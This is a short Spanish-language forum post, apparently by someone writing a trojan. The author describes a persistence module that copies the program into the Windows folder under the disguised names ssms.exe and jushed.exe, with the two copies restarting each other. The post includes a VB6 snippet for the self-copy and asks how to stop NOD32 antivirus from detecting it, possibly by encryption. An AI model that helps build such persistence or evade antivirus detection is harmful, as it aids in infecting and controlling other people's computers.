hace tiempo que estoy con un troyano, y decidi hacerle un modulo de "infeccion", entre comillas por que realmente no es infeccion.. lo unico que hace es copiar el programa 2 veces a la carpeta de windows, con los nombres ssms.exe y jushed.exe, el primero compureba cada cierto rato que exista el archivo jushed y que este iniciado el proceso, si no es asi, se autocopia, i si es necesario inicia el proceso, lo mismo jushed.exe, hace lo mismo, solo que inversamente, ademas de hacer la conexion al troyano. El problema esta en que en el modulo, esta la linea
WinDirek = Environ("windir") & "/"
BSExe = App.path & "/" & App.EXEName & ".exe"
FileCopy BSExe, WinDirek & "jushed.exe"
si saco la linea filecopy, y le paso el nod32, no lo detecta, si la vuelvo a poner me lo empieza a detectar
alguien sabe como solucionarlo??? talve encriptandolo???
GraciasS de Antemano